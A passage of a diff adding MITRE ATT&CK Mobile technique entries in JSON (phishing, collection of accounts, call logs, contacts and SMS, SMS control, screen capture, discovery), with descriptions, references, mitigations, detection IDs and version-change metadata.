+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.632000+00:00\", \"old_value\": \"2025-10-24 17:48:46.514000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0644: Detection of Software Packing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--defc1257-4db1-4fb3-8ef5-bb77f63146df",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-21 19:35:15.552000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Phishing",
+                    "description": "Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as \u201cspearphishing.\u201d Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.\n\nMobile phishing may take various forms. For example, adversaries may send emails containing malicious attachments or links, typically to deliver and then execute malicious code on victim devices. Phishing may also be conducted via third-party services, like social media platforms. Adversaries may also impersonate executives of organizations to persuade victims into performing some action on their behalf. For example, adversaries will often use social engineering techniques in text messages to trick the victims into acting quickly, which leads to adversaries obtaining credentials and other information. \n\nMobile devices are a particularly attractive target for adversaries executing phishing campaigns.  Due to their smaller form factor than traditional desktop endpoints, users may not be able to notice minor differences between genuine and phishing websites. Further, mobile devices have additional sensors and radios that allow adversaries to execute phishing attempts over several different vectors, such as: \n\n- SMS messages: Adversaries may send SMS messages (known as \u201csmishing\u201d) from compromised devices to potential targets to convince the target to, for example, install malware, navigate to a specific website, or enable certain insecure configurations on their device.\n- Quick Response (QR) Codes: Adversaries may use QR codes (known as \u201cquishing\u201d) to redirect users to a phishing website. For example, an adversary could replace a legitimate public QR Code with one that leads to a different destination, such as a phishing website. A malicious QR code could also be delivered via other means, such as SMS or email. In the latter case, an adversary could utilize a malicious QR code in an email to pivot from the user\u2019s desktop computer to their mobile device.\n- Phone Calls: Adversaries may call victims (known as \"vishing\") to persuade them to perform an action, such as providing login credentials or navigating to malicious websites. Common vishing targets include employees, especially executives of organizations, and help desks. This may also be used as a technique to perform the initial access on a mobile device, but then pivot to a desktop computer by having the victims perform actions on a desktop computer. With the rise of artificial intelligence (AI), adversaries may also use AI to clone a person\u2019s voice, resulting in deepfake vishing. The cloned voice provides familiarity to the victims, increasing the likelihood of successful malicious actions performed by the victims. Additionally, adversaries may leave voicemails, which may use a real person\u2019s voice or an AI-generated voice; these scams would urgently ask victims into calling back to perform an action, e.g. sending money or providing sensitive information and credentials.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1660",
+                            "external_id": "T1660"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html",
+                            "external_id": "AUT-9"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Vijay Lalwani",
+                        "Will Thomas, Equinix",
+                        "Adam Mashinchi",
+                        "Sam Seabrook, Duke Energy",
+                        "Naveen Devaraja, bolttech",
+                        "Brian Donohue",
+                        "Lookout"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-04-20 17:38:10.545000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance",
+                            "M1058: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0684: Detection of Phishing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--337e1136-a6d3-4465-a5c5-fdc658117747",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-17 14:58:52.520000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Accounts",
+                    "description": "Adversaries may utilize standard operating system APIs to gather account data. On Android, this can be accomplished by using the AccountManager API. For example, adversaries may use the `getAccounts()` method to list all accounts.(Citation: Android_AccountManager_Feb2025) On iOS, this can be accomplished by using the Keychain services.  \n\nIf the device has been jailbroken or rooted, adversaries may be able to access [Accounts](https://attack.mitre.org/techniques/T1636/005) without the users\u2019 knowledge or approval. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1636/005",
+                            "external_id": "T1636.005"
+                        },
+                        {
+                            "source_name": "Android_AccountManager_Feb2025",
+                            "description": "Android. (2025, February 13). AccountManager. Retrieved September 2, 2025.",
+                            "url": "https://developer.android.com/reference/android/accounts/AccountManager"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Google's Android Security team"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-09-17 15:21:58.225000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0635: Detection of Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 13:12:23.522000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Call Log",
+                    "description": "Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user\u2019s knowledge or approval. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1636/002",
+                            "external_id": "T1636.002"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html",
+                            "external_id": "APP-13"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:29.311000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0602: Detection of Call Log"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 13:17:52.740000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Contact List",
+                    "description": "Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the `Contacts` framework. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Contact List](https://attack.mitre.org/techniques/T1636/003) without the user\u2019s knowledge or approval. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1636/003",
+                            "external_id": "T1636.003"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html",
+                            "external_id": "APP-13"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:30.430000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0679: Detection of Contact List"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 13:25:30.923000+00:00",
+                    "modified": "2026-05-12 15:12:00.715000+00:00",
+                    "name": "SMS Messages",
+                    "description": "Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages. \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [SMS Messages](https://attack.mitre.org/techniques/T1636/004) without the user\u2019s knowledge or approval. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1636/004",
+                            "external_id": "T1636.004"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html",
+                            "external_id": "APP-13"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.715000+00:00\", \"old_value\": \"2025-10-24 17:49:22.003000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0686: Detection of SMS Messages"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-11 15:14:33.730000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "SMS Control",
+                    "description": "Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or various external effects.\n\nThis can be accomplished by requesting the `RECEIVE_SMS` or `SEND_SMS` permissions depending on what the malware is attempting to do. If the app is set as the default SMS handler on the device, the `SMS_DELIVER` broadcast intent can be registered, which allows the app to write to the SMS content provider. The content provider directly modifies the messaging database on the device, which could allow malicious applications with this ability to insert, modify, or delete arbitrary messages on the device.(Citation: SMS KitKat)(Citation: Android SmsProvider)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1582",
+                            "external_id": "T1582"
+                        },
+                        {
+                            "source_name": "Android SmsProvider",
+                            "description": "Google. (n.d.). SmsProvider.java. Retrieved September 11, 2020.",
+                            "url": "https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/7e7c274/src/com/android/providers/telephony/SmsProvider.java"
+                        },
+                        {
+                            "source_name": "SMS KitKat",
+                            "description": "S.Main, D. Braun. (2013, October 14).  Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020.",
+                            "url": "https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html",
+                            "external_id": "APP-16"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html",
+                            "external_id": "CEL-41"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2025-10-24 17:49:15.008000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0599: Detection of SMS Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-08-08 18:34:14.178000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Screen Capture",
+                    "description": "Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1513",
+                            "external_id": "T1513"
+                        },
+                        {
+                            "source_name": "Android ScreenCap2 2019",
+                            "description": "Android Developers. (n.d.). Android Debug Bridge (adb). Retrieved August 8, 2019.",
+                            "url": "https://developer.android.com/studio/command-line/adb"
+                        },
+                        {
+                            "source_name": "Android ScreenCap1 2019",
+                            "description": "Android Developers. (n.d.). Android MediaProjectionManager. Retrieved August 8, 2019.",
+                            "url": "https://developer.android.com/reference/android/media/projection/MediaProjectionManager"
+                        },
+                        {
+                            "source_name": "Lookout-Monokle",
+                            "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.",
+                            "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf"
+                        },
+                        {
+                            "source_name": "Fortinet screencap July 2019",
+                            "description": "Dario Durando. (2019, July 3). BianLian: A New Wave Emerges. Retrieved September 4, 2019.",
+                            "url": "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html"
+                        },
+                        {
+                            "source_name": "Trend Micro ScreenCap July 2015",
+                            "description": "Zhang, V. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved August 8, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html",
+                            "external_id": "APP-40"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2025-10-24 17:48:57.610000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance",
+                            "M1012: Enterprise Policy",
+                            "M1013: Application Developer Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0668: Detection of Screen Capture"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:28.067000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Software Discovery",
+                    "description": "Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions. \n\n \n\nAdversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1418",
+                            "external_id": "T1418"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html",
+                            "external_id": "APP-12"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:27.789000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0600: Detection of Software Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:15.402000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Stored Application Data",
+                    "description": "Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019) \n\n \n\nDue to mobile OS sandboxing, this technique is only possible in three scenarios: \n\n \n\n* An application stores files in unprotected external storage \n* An application stores files in its internal storage directory with insecure permissions (e.g. 777) \n* The adversary gains root permissions on the device ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1409",
+                            "external_id": "T1409"
+                        },
+                        {
+                            "source_name": "SWB Exodus March 2019",
+                            "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html",
+                            "external_id": "AUT-0"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "3.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2025-10-24 17:48:56.509000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0621: Detection of Stored Application Data"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:19.265000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "System Information Discovery",
+                    "description": "Adversaries may attempt to get detailed information about a device\u2019s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infects the target and/or attempts specific actions. \n\n \n\nOn Android, much of this information is programmatically accessible to applications through the `android.os.Build` class. (Citation: Android-Build) iOS is much more restrictive with what information is visible to applications. Typically, applications will only be able to query the device model and which version of iOS it is running. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
